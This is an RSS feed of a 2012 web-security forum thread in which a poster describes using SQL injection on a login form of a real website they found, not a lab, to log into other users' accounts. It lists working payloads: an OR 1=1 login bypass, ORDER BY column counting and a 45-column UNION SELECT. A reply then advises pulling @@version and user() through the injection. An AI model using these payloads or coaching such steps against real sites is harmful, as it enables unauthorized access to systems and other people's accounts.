<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>45 columns ? really ?</title>
        <description>hello

i follow this guide to learn : http://thehackerlounge.blogspot.fr/2009/05/full-sql-injection-tutorial-mysql.html

on a website i found, the flaw is on a login form, i just have to type a &amp;quot; OR 1=1 LIMIT 100000 OFFSET 1# and i am loged on the first account

so i decided to train on that website

i used &amp;quot; ORDER BY x # and i found... 45 columns O_o --&amp;gt; &amp;quot; ORDER BY 45# no error (log me in) and &amp;quot; ORDER BY 46# returned me an error &amp;quot;Impossible d'exécuter la requête : ligne ( 40 ) Unknown column '46' in 'order clause'&amp;quot;

so i used

&amp;quot; union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45# ... but it just log me in :p

any idea on what i should do next ?

edit : i can give you the website but not sure if its required ?</description>
        <link>http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314</link>
        <lastBuildDate>Sat, 18 May 2013 04:37:20 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,46314,47460#msg-47460</guid>
            <title>Re: 45 columns ? really ?</title>
            <link>http://sla.ckers.org/forum/read.php?16,46314,47460#msg-47460</link>
            <description><![CDATA[i think so]]></description>
            <dc:creator>0x3a</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sun, 22 Apr 2012 01:43:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,46314,47459#msg-47459</guid>
            <title>Re: 45 columns ? really ?</title>
            <link>http://sla.ckers.org/forum/read.php?16,46314,47459#msg-47459</link>
            <description><![CDATA[see if there is any number appeared on the webpage...then try to replace the number at the URL with what kind of information that you want... for example &quot;@@version&quot; or &quot;user()&quot;..]]></description>
            <dc:creator>huz</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Sun, 22 Apr 2012 00:58:44 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314</guid>
            <title>45 columns ? really ?</title>
            <link>http://sla.ckers.org/forum/read.php?16,46314,46314#msg-46314</link>
            <description><![CDATA[hello<br />
<br />
i follow this guide to learn : http://thehackerlounge.blogspot.fr/2009/05/full-sql-injection-tutorial-mysql.html<br />
<br />
on a website i found, the flaw is on a login form, i just have to type a &quot; OR 1=1 LIMIT 100000 OFFSET 1# and i am loged on the first account<br />
<br />
so i decided to train on that website<br />
<br />
i used &quot; ORDER BY x # and i found... 45 columns O_o --&gt; &quot; ORDER BY 45# no error (log me in) and &quot; ORDER BY 46# returned me an error &quot;Impossible d'exécuter la requête : ligne ( 40 ) Unknown column '46' in 'order clause'&quot;<br />
<br />
so i used<br />
<br />
&quot; union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45# ... but it just log me in :p<br />
<br />
any idea on what i should do next ?<br />
<br />
edit : i can give you the website but not sure if its required ?]]></description>
            <dc:creator>manserk</dc:creator>
            <category>SQL and Code Injection</category>
            <pubDate>Thu, 12 Apr 2012 14:02:23 -0500</pubDate>
        </item>
    </channel>
</rss>
